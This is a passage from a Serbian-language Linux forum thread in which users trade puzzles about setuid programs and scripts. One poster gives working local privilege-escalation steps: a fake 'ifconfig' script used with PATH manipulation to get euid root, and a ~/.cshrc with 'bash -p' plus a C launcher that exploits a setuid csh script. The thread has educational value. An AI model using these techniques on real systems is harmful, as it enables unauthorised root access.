Suid bit i tekstualne datoteke

Подели преко

This topic has 51 odgovor, 9 glasova, and was last updated 17 years, 4 months ranije by maddox.

Gledanje 31 članaka - 31 do 40 (od 52 ukupno)

← 1 2 3 4 5 6 →

Autor

Članci
1. decembra 2005. u 9:55 pm #37912

japan
Učesnik

uh… predajem se… 😆

kako prevariti strcmp() ?

1. decembra 2005. u 10:19 pm #37913

popeye
Glavni majstor

Tražio si zeca u pogrešnom grmu. 😉

ifconfig:[code]#!/bin/bash -p

. /bin/bash -p[/code]

$ vi ifconfig
$ chmod 755 ifconfig
$ PATH=”.” ./a.out eth0
# id
uid=1000(popeye) gid=1000(popeye) euid=0(root)

1. decembra 2005. u 10:27 pm #37914

popeye
Glavni majstor

za ovo već nisam siguran, možda neki ” ili tako nešto…

Nije mi cilj bio da pričam o prelivanju bafera, to je malo duža (i komplikovanija za neupućene) tema. Ovo oko skripti, odnosno system() funkcije, je lakše za poimanje.

1. decembra 2005. u 10:44 pm #37915

japan
Učesnik

Tražio si zeca u pogrešnom grmu. 😉

znao sam da je neka koska 😛

nije ni prelivanje bafera mnogo teško za shvatiti, samo je potrebno znati kako funkcioniše izvršavanje programa na nivou procesora… a to se uz dobru literaturu lako da naučiti…

1. decembra 2005. u 10:57 pm #37916

popeye
Glavni majstor

Ma stoji da je prosto, ali ni ovde se niko ne javlja. Pre nekog vremena je neko jednom tražio otvaranje foruma “Sigurnost” i tom prilikom sam odgovorio da za takvim forumom nema dovoljno korisnika koji bi učestvovali u nekoj normalnoj diskusiji. Danas sam malo zaludniji pa iskoristih ovu temu da vidim kako stoje stvari.

1. decembra 2005. u 11:10 pm #37917

LimitMan
Učesnik

Mene zanima … Mada stvarno nemam snage za vecu raspravu (neispavan, radio previse i sl…). Samo vas gledam i iskreno … saznajem neke nove stvari 😉 Mada je dosta tu i starih …

1. decembra 2005. u 11:14 pm #37918

popeye
Glavni majstor

znao sam da je neka koska 😛

Hehe, ima puna korpa koski.

Šta misliš, u čemu je problem u ovoj skripti:

[code]#!/bin/csh

echo “Test!”[/code]

Pod pretpostavkom da je je vlasnik root, dozvole su 4755 i sistem poštuje suid bit na skripti, može li se dobiti root shell?

1. decembra 2005. u 11:24 pm #37919

LimitMan
Učesnik

zaista ne vidim kako bi “Hello world” primer mogao da bude access to root preko suid-a …

Ako je to moguce … onda je sve moguce 😀

1. decembra 2005. u 11:45 pm #37920

japan
Učesnik

pomoslio sam da je dovoljno uraditi isto što i malopre, ali izgleda da nije…

2. decembra 2005. u 1:32 am #37921

popeye
Glavni majstor

~/.cshrc:
[code]/bin/bash -p[/code]

pokretac.c:
[code]#include

int main() {

execl(“test.sh”,”-“,0);
return 0;

}
[/code]

$ vi ~/.cshrc
$ vi pokretac.c
$ make pokretac
$ ./pokretac.c
$ ps
PID TTY TIME CMD
26292 pts/0 00:00:00 bash
26370 pts/0 00:00:00 test.sh
26371 pts/0 00:00:00 bash
26380 pts/0 00:00:00 ps

Kao što vidiš, dve instance bash školjke su pokrenute. Izlaskom iz tako dobijenog shella, izvršava se test.sh (ispisuje se “Test!”). Kada bi sistem dozvolio suid za skriptu, ovo bi trebao biti root shell.
Autor

Članci

Gledanje 31 članaka - 31 do 40 (od 52 ukupno)

← 1 2 3 4 5 6 →

Moraš biti prijavljen da bi postavio komentar u ovoj temi.